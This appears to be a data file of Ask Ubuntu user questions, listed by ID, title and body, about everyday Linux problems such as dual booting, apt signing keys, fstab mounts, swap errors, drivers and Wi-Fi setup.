503330	difference between key ( recv-keys ) , signing key , and fingerprint in apt/ppa system	let 's take https : //launchpad.net/~ansible/+archive/ubuntu/ansible as an example . if you click on 'technical details about this ppa ' you see : signing key : 4096r/7bb9c367 fingerprint : 6125e2a8c77f2818fb7bd15b93c4a3fd7bb9c367 if you try to add that software without adding the key you get w : gpg error : http : //ppa.launchpad.net trusty release : the following signatures couldn't be verified because the public key is not available : no_pubkey 93c4a3fd7bb9c367 when i do apt-key list i see 4096r/7bb9c367 . to add the key i need to do apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 93c4a3fd7bb9c367 . and fingerprint does n't seem to be mentioned anywhere . what is the difference between all these values ? why do i not need to to apt-key ... -- recv-keys if adding the ppa but i need to if manually adding the line to /etc/apt/sources.list.d ? how does ppa know that 93c4a3fd7bb9c367 is what it needs to use , where does it find this ? bonus round : what is the difference between using a ppa vs just adding a line to /etc/apt/sources.list.d/ ? where is this ppa thing 'hosted ' that just adding ppa : ansible/ansible is enough to add that line to sources.list.d ?
503333	how to extend/increase ubuntu disk space on a dual boot win7/ubuntu 12.4	i have installed windows 7 and ubuntu 12.04 as dual boot on my 320 gb laptop . i have three partitions . 200 gb - window 's 7 is installed in it . 100 gb - ntfs partition ( un used ) . 20 gb - ubuntu 12.04 . i can access 100 gb ( new volume ) both in windows and ubuntu 12.04 . i am running out of ubuntu disk space . how can i extend/increase 20 gb to 120 gb by using 100 gb ( unused ) disk space ?
503334	how to move directories that were listed in a .txt file ?	i 'm using a program to tag music that generates a .txt list of the skipped ( untagged ) folders that processes . i just want to be able to take this list ( that have the complete path for each folder ) and move this listed folder somewhere /media/skipped/ i could n't find with du command or find how to do it ... and my capacities in cli and in general with linux are very basics . so thanks if someone can give me direction on my search , or some command to use ... edit : ok ... you are really awesome ... thanks to all for your fast answers . yes each line is a path ( actually have some line before each importing time , that i erase , and before the path says `` skipped folder '' that i run a find and replace command in mousepad . so , only paths , one per line rests ) edit2 : solution from @ steeldriver worked . i just need to edit further the .txt . this post can be marked as [ solved ] , i do n't know how to . thanks to all .
503337	can i run a desktop os in a virtual machine as if it ran on bare metal ?	i would like to run a desktop ubuntu vm on top of ( desktop or server ) ubuntu host ; all the while looking like it is running on the bare metal . the reason for this is i would like to relegate critical processes to the host machine ; where i can not disrupt their operation ( i could , but i would have to specifically log in to the host system to do that ; and most of the time i will be working in the vm instead ) and where they wo n't be troubled by such things as system restarts . i 'd like to use kvm virtualization , as that 's what i 'm familiar on the server . i think i 'll need vga passthrough for near-native performance ? can i do that on a laptop with just an integrated intel graphics card ? i prefer command-line solutions that can be automated .
503339	where does xhost ( or related x11 services ) store access denied logs	every time i setup a new computer for remote access i have problems getting it added to the xhost access list . i eventually get each system added . it would save a lot of time if i could locate the logs of the system 's denied attempts . can someone help me with the location of where this type of information is logged ? all my searches respond with the information that i already have ( ie `` ca n't open display '' even after access with xhost ) . however , as in the linked case , the answer it to refer to the server 's configuration but not actually refer to where the errors are logged on the server . if the failed attempts are actually logged on the x11 server this specific information would be invaluable in trouble shooting the problem .
503340	installing ubuntu dual boot on acer aspire e1 522 notebook	a few weeks ago i bought an acer aspire e1 522 notebook with an amd a6 quad-core processor . i wanted to install a dual boot with ubuntu , but the ubuntu installer did not give me the option to `` install alongside windows '' . i continued the installation and i lost windows 8 ( a little evil ) . then i decided i wanted to start over and do a dual boot with windows 7 . when i rebooted the computer to start windows 7 , the computer gave me an error saying that the security settings did not allow to start the disk . so i entered the uefi firmware and i removed the safety lock ; however , the computer would not let me install windows 7 . so i changed the bios mode in legacy ( i was right ) and i finally installed windows . then i restarted the computer to install ubuntu 14.04.1 with the exact same problem starting ( i did not check for the next windows install ) . finally i opened the gparted live which gave me an error message saying that probably the gpt partition was erased or corrupted . what should i do ? i only would like to be able to install and use these two operating systems , nothing else . thank you !
503343	ubuntu 14.04 booting problem	i 've tried installing ubuntu 14.04 using usb flash drive along with windows 7 . for that i 've created 100 gb empty drive for installing it . after i had done with it was showing a grub menu showing ubuntu , windows 7 loader in the menu ( along with something like ubuntu advanced options ) . but when i press enter on the highlighted text neither ubuntu nor windows was working . i tried using boot-repair . it generated report . please see the below link for that . http : //paste.ubuntu.com/7875333 now i can not even use windows 7 since i do n't have original cd nor its license . : p
503345	failed to fetch everything in parallels desktop	my main purpose is to download some sudo apt-get packages for hepmc program in the parallels desktop . yet i can not configure it and gives a problem related to apt-get install g++ . i am doing it ( also with sudo option ) but it gives `` e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? '' . so i try update or build essentials but all it gives the `` 404 not found '' and then `` failed to fetch '' problem for every packages . please help me ! best regards .
503346	how can i make my usb - ttl converter work >	i have recently bought this usb to ttl serial converter cable on amazon . i just bought it to get free postage and thought i would use it with my raspberry pi . this adafruit tutorial says to use 'screen ' to connect . with the cables plugged in , when i run : sudo screen /dev/ttyusb0 115200 i get an error saying : can not exec '/dev/ttyusb0 ' : no such file or directory . when i plug it in to a usb slot i get : *from 'dmesg'* [ 3163.762526 ] usb 3-3 : new full-speed usb device number 2 using xhci_hcd [ 3163.762705 ] usb 3-3 : device not responding to set address . [ 3163.966709 ] usb 3-3 : device not responding to set address . [ 3164.170765 ] usb 3-3 : device not accepting address 2 , error -71 [ 3164.282989 ] usb 3-3 : new full-speed usb device number 3 using xhci_hcd [ 3164.283279 ] usb 3-3 : device not responding to set address . [ 3164.487170 ] usb 3-3 : device not responding to set address . [ 3164.691195 ] usb 3-3 : device not accepting address 3 , error -71 [ 3164.803349 ] usb 3-3 : new full-speed usb device number 4 using xhci_hcd [ 3164.803535 ] usb 3-3 : device not responding to set address . [ 3165.007640 ] usb 3-3 : device not responding to set address . [ 3165.211650 ] usb 3-3 : device not accepting address 4 , error -71 [ 3165.323680 ] usb 3-3 : new full-speed usb device number 5 using xhci_hcd [ 3165.323821 ] usb 3-3 : device not responding to set address . [ 3165.527985 ] usb 3-3 : device not responding to set address . [ 3165.731963 ] usb 3-3 : device not accepting address 5 , error -71 [ 3165.732086 ] hub 3-0:1.0 : unable to enumerate usb device on port 3 i 'm not too sure what all of this means : is this unit faulty ? any ideas would be great ! i am using ubuntu 14.04 64 bit if i plug the setup into a different computer with usb 2 i get this set of error messages from dmesg . [ 21009.034081 ] usb 2-6 : new full-speed usb device number 16 using ohci-pci [ 21009.214180 ] usb 2-6 : device descriptor read/64 , error -62 [ 21009.498348 ] usb 2-6 : device descriptor read/64 , error -62 [ 21009.778514 ] usb 2-6 : new full-speed usb device number 17 using ohci-pci [ 21009.958525 ] usb 2-6 : device descriptor read/64 , error -62 [ 21010.242725 ] usb 2-6 : device descriptor read/64 , error -62 [ 21010.522910 ] usb 2-6 : new full-speed usb device number 18 using ohci-pci [ 21010.931071 ] usb 2-6 : device not accepting address 18 , error -62 [ 21011.107326 ] usb 2-6 : new full-speed usb device number 19 using ohci-pci [ 21011.515449 ] usb 2-6 : device not accepting address 19 , error -62 [ 21011.515526 ] hub 2-0:1.0 : unable to enumerate usb device on port 6
503349	duplicity does not run via anacron in 14.04	since the implementation of the lockfile option i can not run duplicity via anacron ( https : //bugs.launchpad.net/duplicity/+bug/1320641 ) . is there any way to circumvent this ?
503353	maltego on ubuntu 14.04	how to install maltego ce on ubuntu 14.04 ? i have it installed but it does not load up . perhaps , someone would help me with installation and settings . thanks
503356	installing dwm-157 on ubuntu 14.04	i am trying to install my new d-link usb modem on ubuntu 14.04 . i followed these instructions . except that there was no .tar.gz files . so i installed the .deb files , which instead . it seems like everything installed fine , because i did not get any errors : ( reading database ... 176487 files and directories currently installed . ) preparing to unpack 3g_modem_connect_dtlw4_d310_amd64.deb ... unpacking 3g-modem-connection-dtlw4-d310a-amd64 ( 2.0.1eu ) over ( 2.0.1eu ) ... setting up 3g-modem-connection-dtlw4-d310a-amd64 ( 2.0.1eu ) ... install finished however when i try to setup my `` mobile broadband '' connection from unity , the device does not appear on the list . i have also installed usb-modeswitch , but it does not seem to make a difference . after the installation ls /dev/sr* only shows /dev/sr0 when i enter lsusb my device is listed as bus 001 device 002 : id 2001:7d02 d-link corp . the contents of /etc/3g_modem_connection/switch.conf is : defaultvendor= 0x2001 defaultproduct= 0xa707 targetvendor= 0x2001 targetproduct= 0x7d02 messagecontent= '' 5553424312345678000000000000061b000000020000000000000000000000 '' i have also added my apn to /etc/3g_modem_connection/apn.dat : 8ta,65502 , , , ,internet,0 , this modem is supposedly supported by ubuntu . that is why i choose the ubuntu distro in the first place . what am i missing here ?
503357	how to skip startup and/or .profile on log-in ?	is there a login option to skip processing the .profile and startup applications ? i basically have a script in there that 's hanging the system upon log-in . the filesystem is encrypted and i do n't have the passphrase and there are no other root users . so i 'd like to login in as the user but without processing the script in .profile or startup applications .
503362	secondary display does n't work in ubuntu 14.04	i want to connect my laptop to an external monitor , but when i connect it , nothing appears . in the display settings both built-in display option and mirror display option are greyed out .
503365	install karma machine on desktop ( 14.04 )	just curious if it is possible to install karma machine on the desktop ( 14.04 64bit ) ?
503367	sftp/ssh not working in ubuntu touch	it was working before but now it stopped working . even in ubuntu sdk i ca n't run my application directly to my device ... though i 'm not sure they are related . the error is : command : open `` phablet @ 192.168.1.7 '' 22 error : disconnected : no supported authentication methods available ( server sent : publickey ) error : could not connect to server my device is nexus 7 2013 ( flo ) with ubuntu touch 14.10 r153 . i installed it through multirom and i actually did a fresh install but still no luck .
503369	some advanced ssh tunneling hashing ip address	is it possible to to stay in total anonymous mode for the vps provider ? i have got a vpsvz machine with ubuntu server . is it possible to do anonymous tunneling : vps1 - > vps2 - > vps3 ( all ubuntu ) and vps2 provider can not see vps1 ip number and vps3 provider can not see vps2 ip number after i login i always see `` cumentation : https : //help.ubuntu.com/ last login : sun jul 27 01:55:30 2014 from 79.124.xxxxxxx '' and i would like to stay 100 % anonymous is it possible ?
503374	firefox has trouble connecting to web pages	i have been on a vacation for about ten days and after i returned i found firefox in a terrible state . it seems to have no problems connecting to some of the `` bigger '' web pages like google , gmail , facebook , etc . however , other pages like ebay , askubuntu.com , an most of the other web pages load either extremely slowly , or fail to load at all ( and i have to re-try several times ) . i think the problem lies in establishing a connection with the page for some reason , but i have no idea what could be the cause ( especially since nobody uses my computer and it worked quite well before ) .
503376	flash player installed with update-pepperflashplugin-nonfree is not working on youtube on chromium	i was following the instructions on this page : https : //wiki.ubuntu.com/chromium/getting-flash . i run this in the terminal : sudo update-pepperflashplugin-nonfree -- install and i get this output : 2014-07-26 01:56:02 ( 2,47 mb/s ) - ‘/tmp/pepperflashplugin-nonfree.bqgj40yyue/google-chrome-stable_36.0.1985.125-1_‌​amd64.deb’ saved [ 48386260/48386260 ] and after restarting chromium , flash is not detected on youtube and the html5 player is started . running sudo update-pepperflashplugin-nonfree -- status prints the following lines in the terminal : flash player version installed on this system : 14.0.0.145 flash player version available on upstream site : 14.0.0.145 but i still do n't have flash in chromium on youtube . i have this entry in chrome : //plugins page and flash works normally on other websites : http : //i861.photobucket.com/albums/ab180/silviubogan/screenshotfrom2014-07-26022752.png i really need some help .
503377	swap partion problem	i installed ubuntu 14.04 from a dvd using 'install alongside windows 7 . the whole installation went smoothly with no problem . when i restarted i got a message while showing ubuntu logo : /dev/mapper/cryptswap1 not found ( something like that ) . i went so many q & a here nothing worked . the common error i 'm getting whatever i do is this : /dev/mapper/cryptswap1 : stat failed : no such file or directory this is my fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda5 during installation uuid=0f300f32-475d-4073-abc5-d9c3a2dc6f45 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda6 during installation # uuid=d7f4327f-7c60-494e-9425-6462faecdd96 none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 sda6 is my swap partition and it had a different uuid that gparted showed so , i updated with the current one , saved fstab and gave sudo swapon -- all in terminal : devanandh @ devanandh : ~ $ sudo swapon -- all [ sudo ] password for devanandh : swapon : /dev/mapper/cryptswap1 : stat failed : no such file or directory devanandh @ devanandh : ~ $ sudo swapon -- all -- verbose swapon on /dev/mapper/cryptswap1 swapon : /dev/mapper/cryptswap1 : stat failed : no such file or directory contents of /etc/crypttab : cryptswap1 uuid=bd732933-344c-43cf-874b-3d58f6487c96 /dev/urandom swap , cipher=aes-cbc-essiv : sha256 output of sudo blkid : /dev/sda1 : uuid= '' 4a620a11620a0285 '' type= '' ntfs '' /dev/sda2 : label= '' media center '' uuid= '' 7204726b047231e9 '' type= '' ntfs '' /dev/sda3 : label= '' black hole '' uuid= '' 9682bc0c82bbef3d '' type= '' ntfs '' /dev/sda5 : uuid= '' 0f300f32-475d-4073-abc5-d9c3a2dc6f45 '' type= '' ext4 '' /dev/sda6 : uuid= '' d7f4327f-7c60-494e-9425-6462faecdd96 '' type= '' swap '' and this is my output .
503381	get first ubuntu startup sound in 14.04	i 've seen that ubuntu had two startup sounds , and if you make a startup app that executes the command /usr/bin/canberra-gtk-play -- id= '' desktop-login '' -- description= '' gnome login '' , or just execute it in terminal , it plays the new startup sound ( before 11.04 ) . i want to play the old one from 6.06 lts dapper drake . is it still in 14.04 or will i have to download the sound ? then how can i make it play ? here 's the sound i 'm talking about . how can i also get the shutdown sound too ?
503384	switching between front panel hda headphones and usb audio	so , my front panel audio uses hda audio and my speakers are connected through usb , how can i make them switch automatically . my audio card is integrated and running cat /proc/asound/card0/codec* | grep codec reveals codec : realtek alc892 . i did n't find it in /usr/share/doc/alsa-base/driver/hd-audio-models.txt.gz . please help . remark : i had the same problem on windows . i think some udev rule should work . update : something 's clearly wrong , because when i monitor with udev , it does n't detect when i plug it , nor when i unplug it .
503385	how to fix touchpad on fujitsu uh572	i have read some answers about enabling touchpad on other laptops , but it does not work in my case . i have listed devices on my laptop and found touchpad.then i tried to enable it . xinput set-prop `` synps/2 synaptics touchpad '' `` device enabled '' 1 however it does not work in my case . i check my properties with xinput list-props `` synps/2 synaptics touchpad '' device enabled ( 135 ) : 1 coordinate transformation matrix ( 137 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 265 ) : 1 device accel constant deceleration ( 266 ) : 2.500000 device accel adaptive deceleration ( 267 ) : 1.000000 device accel velocity scaling ( 268 ) : 12.500000 synaptics edges ( 289 ) : 1752 , 5192 , 1620 , 4236 synaptics finger ( 290 ) : 25 , 30 , 0 synaptics tap time ( 291 ) : 180 synaptics tap move ( 292 ) : 221 synaptics tap durations ( 293 ) : 180 , 180 , 100 synaptics clickpad ( 294 ) : 1 synaptics middle button timeout ( 295 ) : 0 synaptics two-finger pressure ( 296 ) : 282 synaptics two-finger width ( 297 ) : 7 synaptics scrolling distance ( 298 ) : -100 , -100 synaptics edge scrolling ( 299 ) : 1 , 1 , 0 synaptics two-finger scrolling ( 300 ) : 0 , 0 synaptics move speed ( 301 ) : 1.000000 , 1.750000 , 0.039809 , 0.000000 synaptics off ( 302 ) : 0 synaptics locked drags ( 303 ) : 0 synaptics locked drags timeout ( 304 ) : 5000 synaptics tap action ( 305 ) : 2 , 3 , 0 , 0 , 1 , 3 , 0 synaptics click action ( 306 ) : 1 , 3 , 0 synaptics circular scrolling ( 307 ) : 0 synaptics circular scrolling distance ( 308 ) : 0.100000 synaptics circular scrolling trigger ( 309 ) : 0 synaptics circular pad ( 310 ) : 0 synaptics palm detection ( 311 ) : 0 synaptics palm dimensions ( 312 ) : 10 , 200 synaptics coasting speed ( 313 ) : 20.000000 , 50.000000 synaptics pressure motion ( 314 ) : 30 , 160 synaptics pressure motion factor ( 315 ) : 1.000000 , 1.000000 synaptics resolution detect ( 316 ) : 1 synaptics grab event device ( 317 ) : 1 synaptics gestures ( 318 ) : 1 synaptics capabilities ( 319 ) : 1 , 0 , 0 , 1 , 1 , 1 , 1 synaptics pad resolution ( 320 ) : 73 , 55 synaptics area ( 321 ) : 0 , 0 , 0 , 0 synaptics soft button areas ( 322 ) : 3472 , 0 , 3900 , 0 , 0 , 0 , 0 , 0 synaptics noise cancellation ( 323 ) : 8 , 8 device product id ( 254 ) : 2 , 7 device node ( 255 ) : `` /dev/input/event4 '' i am not sure what to start with from here . it is enabled , but i am not sure how to set other coordinates . i have found closed question , but it is not solved . xinput -- set-prop does not work for touchscreen
503386	ca n't get belkin f9l1108-tg usb wirlees adapter working	im trying to get a belkin dual band wi fi adapter to be seen in ubuntu 14.04.1 , with no luck ... any help would be greatly apreciated ... .i tried a suggestion i found on here with no success . i tried installing rtl8192du.git , but when i get to the make , i get these errors : make error1 and error2 . if i do lsusb i get : bus 001 device 003 : id 050d:110a belkin components bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 15d9:0a4c trust international b.v. usb+ps/2 optical mouse bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub joe @ amelia : ~/rtl8192du $
503389	automount ntfs hdds in specific locations and share them in lan	o.s : raspbmc i need to share 4 hdds over my lan , but the fstab i wrote does't work as i aspect . edit1~ here 's the part of fstab made for those hdds : # external hhds label=incompleted\040seasons /media/incompletedseasons ntfs-3g auto , rw , exec , async , dmask=0002 , fmask=0003 , uid=1000 , gid=1000 0 0 label=films /media/films ntfs-3g auto , rw , exec , async , dmask=0002 , fmask=0003 , uid=1000 , gid=1000 0 0 label=music\040and\040animation /media/musicandanimation ntfs-3g auto , rw , exec , async , dmask=0002 , fmask=0003 , uid=1000 , gid=1000 0 0 label=completed\040seasons /media/completedseasons ntfs-3g auto , rw , exec , async , dmask=0002 , fmask=0003 , uid=1000 , gid=1000 0 0 they are named correctly , and folders for mountpoints already exists : root @ raspbmc : /home/pi # ls -la /media/ total 24 drwxrwxr-x 6 root root 4096 jul 27 19:08 . drwxr-xr-x 24 root root 4096 jul 13 19:20 .. drwxrwxr-x 2 pi pi 4096 jul 27 19:08 completedseasons drwxrwxr-x 2 pi pi 4096 jul 27 19:07 films drwxrwxr-x 2 pi pi 4096 jul 27 19:07 incompletedseasons drwxrwxr-x 2 pi pi 4096 jul 27 19:07 musicandanimation at this point , i aspect that throwing mount -a will mount those 4 hdds , in those 4 folders with permissions are wrote in the fstab . let 's try : root @ raspbmc : /home/pi # mount -a mount : devpts already mounted or /dev/pts busy ntfs-3g : failed to access volume 'label=music and animation ' : no such file or directory ntfs-3g 2012.1.15ar.5 external fuse 29 - third generation ntfs driver configuration type 7 , xattrs are on , posix acls are on copyright ( c ) 2005-2007 yura pakhuchiy copyright ( c ) 2006-2009 szabolcs szakacsits copyright ( c ) 2007-2011 jean-pierre andre copyright ( c ) 2009 erik larsson usage : ntfs-3g [ -o option [ , ... ] ] < device|image_file > < mount_point > options : ro ( read-only mount ) , remove_hiberfile , uid= , gid= , umask= , fmask= , dmask= , streams_interface= . please see the details in the manual ( type : man ntfs-3g ) . example : ntfs-3g /dev/sda1 /mnt/windows news , support and information : http : //tuxera.com root @ raspbmc : /home/pi # ls -la /media/ total 204 drwxrwxr-x 6 root root 4096 jul 27 19:08 . drwxr-xr-x 24 root root 4096 jul 13 19:20 .. drwxrwxr-x 1 pi pi 4096 jul 19 17:17 completedseasons drwxrwxr-x 1 pi pi 4096 jul 12 21:58 films drwxrwxr-x 1 pi pi 4096 jul 27 18:51 incompletedseasons drwxrwxr-x 2 pi pi 4096 jul 27 19:07 musicandanimation it works ! do n't mind the 4th failed , it 's turned off ... then i reboot the device , and this is the result : root @ raspbmc : /home/pi # ls -la /media/ total 152 drwxrwxr-x 8 root root 4096 jul 27 19:40 . drwxr-xr-x 24 root root 4096 jul 13 19:20 .. drwx -- -- -- 1 pi pi 4096 jul 19 17:17 completed seasons drwxrwxr-x 2 pi pi 4096 jul 27 19:08 completedseasons drwxrwxr-x 2 pi pi 4096 jul 27 19:07 films drwx -- -- -- 1 pi pi 4096 jul 27 18:51 incompleted seasons drwxrwxr-x 2 pi pi 4096 jul 27 19:07 incompletedseasons drwxrwxr-x 2 pi pi 4096 jul 27 19:07 musicandanimation usually these new folders are mounted normally , but the olders are empty . did i forget doing something ? did i make any mistake ? can you help me please ? edit2~ i tried renamig folders and fstab mountpoints with the same name as the labels , and , after the reboot , the result was something like this : root @ raspbmc : /home/pi # ls -la /media/ total 152 drwxrwxr-x 8 root root 4096 jul 27 19:40 . drwxr-xr-x 24 root root 4096 jul 13 19:20 .. drwx -- -- -- 1 pi pi 4096 jul 19 17:17 completed seasons_ drwxrwxr-x 2 pi pi 4096 jul 27 19:08 completed seasons drwx -- -- -- 1 pi pi 4096 jul 19 17:17 films drwx -- -- -- 1 pi pi 4096 jul 27 18:51 incompleted seasons_ drwxrwxr-x 2 pi pi 4096 jul 27 19:07 incompleted seasons drwxrwxr-x 2 pi pi 4096 jul 27 19:07 music and animation i thought the system had n't enought privileges to use my folders as mountpoints , but i do n't understand where to fix it ( if i need this ) . could it be caused by the use of 'pi ' user instead of 'root ' one ? ( uid=1000 and gid=1000 are both refered to pi user and group ) . samba and xbmc are forced to look into those folders for my media stuff , could it be part of the problem ? edit3~ i tried to use uuid instead of labels , nothing changed . but , this time , i did n't mount them manually and just reboot , and i noticed that nothing happened . no mounted hdds , no new folders , and the old one is perfectly the same as before ( empty and with same privileges ) . it seems fstab does n't work at all , so i checkd its mods : root @ raspbmc : /home/pi # ls -la /etc/fstab -rw-r -- r -- 1 root root 1347 aug 4 09:31 /etc/fstab just to try , i changed it in : root @ raspbmc : /home/pi # ls -la /etc/fstab -rwxrwxr -- 1 root root 1347 aug 4 09:41 /etc/fstab and reboot , but nothing new . i cleaned the fstab a little bit , to test with just 1 hdd at a time , with this build : uuid=646adb4c6adb199e /media/incompletedseasons ntfs-3g auto , rw , exec , async , dmask=0002 , fmask=0003 , uid=1000 , gid=1000 0 0 of course , the uuid is correct : root @ raspbmc : /home/pi # blkid /dev/mmcblk0p1 : uuid= '' cec6-297f '' type= '' vfat '' /dev/mmcblk0p2 : uuid= '' f5035424-d974-4c50-b749-76d000ba1ee6 '' type= '' ext4 '' /dev/sda1 : label= '' incompletedseasons '' uuid= '' 646adb4c6adb199e '' type= '' ntfs '' nobody wants to join me here ?
503390	internet not working , network card may be disabled	hey so i have been using linux for a few weeks now for school . i am at this part where i have to ping websites and paste screen shots of my terminal use . i have been struggling for the past couple weeks trying to get my internet to work while i am in linux . i have tried a wired connection , and a wireless connection . my internet works fine when i am in windows os , but when i switch over to linux it does not work . it says , `` no network connections available . '' i tried creating a wired/wireless connection , it asked for information such as my : ssid , bssid , and mac address , i was n't too sure on where to get a bssid but entered information to the best of my ability and it did not work . i had called my isp trying to get help and they told me they could n't help me . i even had a friend from intel come over and try and help with no luck . i need this connection asap in order to complete my school work . i have searched dozens on forums looking for answers , i have entered quite a few commands into the terminal without luck . i have a suspicion that my network card may be disabled when i switch os , if anyone could help with this i would appreciate it . ` lsb_release -d : ubuntu 10.04 lts lspci -nn | grep 0280 : 03:00.0 network controller [ 0280 ] : atheros communications inc. device [ 168c:0034 ] ( rev01 ) rfkill list all : 0 : hci0 : bluetooth soft blocked : no hard blocked : no
503391	how to install opencl and cuda	i have desktop computer : cpu : intel® core™ i7-4770 cpu @ 3.40ghz × 8 gpu : geforce gtx 770/pcie/sse2 i would like to use opencl/ cuda in my own c programs . i can use : old ubuntu = 13.04/ 64 bit ( because there is no cuda toolkit for latest lts ubuntu version ) , then installation should be `` easy '' , but then will be no safety upgrades for ubuntu latest lts ubuntu = 14.04 , but then i will have problems with installation . which options is better ? tia adam
503392	installing ubuntu 14.04 in win 7 lost partition	today i installed ubuntu 14.04lts on windows 7 then in ubuntu , win 7 partition didnt appear . it shows whole drive 3.1gb used and 147. gb free how to recover win 7 partition and uninstall ubuntu and win 7 back
503396	windows install ( media drivers )	i have been trying to install windows 7 64bit onto my ubuntu 12.04 machine for quite awhile . i succeeded in installing the win7 64bit iso onto my usb via unetbootin-linux-494 and formating the usb into ntfs format via gparted . this created a bootable win7 usb . i get the following error when i try to install windows from the usb : http : //support.microsoft.com/kb/2755139 does anyone know what media drivers there are and how i can get them ? if it matters , i do not think that my cd/dvd drive is working which is why i am using a usb to install windows . someone told me that it may be because the windows installation was n't able to read the drivers from the usb , but i 'm not quite sure if that is the issue . if anyone has advice on this issue , it would be greatly appreciated as i have been working on this issue for the past week .
503397	how do i install wpa-supplicant on an offline server ?	alright , i have an ubuntu server on which i could n't connect to my wpa2 secured wi-fi network . apparently i need wpa-supplicant to be able to connect to it ( see how do i connect to a wpa wifi network using the command line ? ) , but ironically i ca n't download it being offline . so , how can i download wpa-supplicant , get it on a usb device and install it on the server ? i have no idea so far ... ps : i only have a mac as a primary machine , so i ca n't download it from another ubuntu .
503398	is ubuntu compatible with adobe flash	i downloaded adobe flash and vlc media player , into new ubuntu . now all videos look like ''test cards '' or colored silhouettes .
503400	wrong name in grub	this question is at least partly about linux mint but it also has ubuntu in it so i decided to ask it here . i recently update linux mint 16 to 17 . i did this using apt instead of a fresh install . it finished and when i rebooted my computer the linux mint grub option disappeared . ( my computer triple boots ubuntu , mint and windows 7 ) however there was a new option that simply said 'ubuntu ' . i chose that and it started loading mint ! is there away to change the name back to mint ? ( i already tried grub customized and it listed it as linux mint not ubuntu so it did n't help )
503404	what packages do i need to install on an ubuntu desktop for it to `` become a server '' ?	alright , so due to problems connecting to a wifi network on the ubuntu server distribution , i want to install the neccesary packages for a lamp , mail and ssh server on an ubuntu desktop 14.04 lte distribution ( i am able to connect to the internet with the desktop version ) . what should i install from the command line ? thanks in advance !
503405	intel i915 driver not in any of the diplays	i 'm running ubuntu 12.04 . everything was working fine until i booted up ubuntu this morning and it froze at the purple screen , sometimes going to black screen then freezing there . i started it in recovery mode which worked , and it said to put in a nomodeset at the splash screen , so i did . i got in normal boot , but the screen resolution is messed up . the right edge of the screen is cut off and if i move the cursor to the right then it shows , but then the left edge is cut off . when i checked the additional drivers , it was completely empty , with nothing in it . in addition , the entire screen seems stretched out . running lshw -c video gives me this : *-display unclaimed description : vga compatible controller product : rv635/m86 [ mobility radeon hd 3650 ] vendor : hynix semiconductor ( hyundai electronics ) physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list configuration : latency=0 resources : memory : c0000000-cfffffff ioport:2000 ( size=256 ) memory : bfff0000-bfffffff memory : bff00000-bff1ffff *-display unclaimed description : vga compatible controller product : mobile 4 series chipset integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 07 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list configuration : latency=0 resources : memory : fc000000-fc3fffff memory : d0000000-dfffffff ioport:1800 ( size=8 ) running lspci | grep -i vga gives me this : 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rv635/m86 [ mobility radeon hd 3650 ] and in system settings it says my driver is vesa : intel ( r ) cantiga graphics is there any way to fix the stretch and the edges being cut off , and to be able to boot in normal mode without the nomodeset ?
503408	windows install ca n't find hard drive after uninstalling ubuntu 12.04	i have a dell xps gen 5 , which i installed ubuntu 12.04 and put virtualbox on to have windows available . it worked fine , till a `` recommended update '' . virtualbox no longer worked and ubuntu kept barfing up system problem detected on every start . i dropped a windows xp installation cd to put xp back on , but it the installer could n't find a hard drive . i figured this might be due to the file system or something . i used the ubuntu live cd to access gparted and wiped the hard drive out , then i created a new partition table with an ntfs partition and a fat32 partition . xp still ca n't find a hard drive when i use the xp install cd . ubuntu can see/format the drive just fine , so i know it 's not a hardware or connection problem . how do i get xp back on this machine ? edit : this morning i tried using gparted again to wipe the hard drive and create new partition table , then did not create any partitions . to my knowledge xp setup can do the partitioning , so i thought that might work better , but i got the same error .
503409	vmware requirements for ubuntu	i am running windows 8 on my pc . i want to run ubuntu on my vmware . how much ram and hdd space is required to run it smoothly on virtual machine .
503410	only one resolution option 480 x 620 ( 4\3 )	i have installed oracle virtual box on my hp laptop and set up a virtual hard drive with 21gb of memory . however i cant get the resolution to change from 480 x 620 ( 4/3 ) . the laptop has a 2gb nvidia geforce'gt635m
503412	how do you add the pirate bay scope ?	so , i 've installed unity-scope-piratebay , but it does n't work in 14.04. unity-lens-torrents is not published for trusty and even after installing from a .deb file it does n't work . there is no lens and there is no filter .
503416	wifi country changed to us , how do i change it back ?	my eeepc running ubuntu 14.04 suddenly did n't see my wireless network on channel 13 any more , about july 23 2014. iw reg get says it 's set to country us . iw reg get on my other laptop running ubuntu 12.04 and not updated for a while says country 00 and it works fine . sudo iw reg set se solves the problem but only until reboot , what is the correct way to fix this problem ?
503417	how to prevent ubuntu from overwriting grub bootloader after update ?	is there any way i can stop ubuntu from overwriting bootloader ? it happens after updating ( i suppose ) system 's kernel . i want to stay with my other linux distro bootloader without having to change it manually every time a certain update og ubuntu is changing it . thanks .
503418	ubuntu installer no partition type option	today i decided to install ubuntu ( 12.04 lts because i had the dvd already ) alongside my windows 8.1 in every tutorial i 've seen so far , when the part of creating a new partition comes , i should have this : check image : http : //leekaelin.co.uk/downloads/techspot/linux_guides/ubuntu_11_10/ubuntu_11_10_capture3e.jpg however , what it shows up is only this : http : //i.imgur.com/z1nczdx.png where is the `` type for the new partition '' option ? i 've searched already and i did n't find a single topic about this . am i the only one with this problem ? what 's happening ? thanks in advance
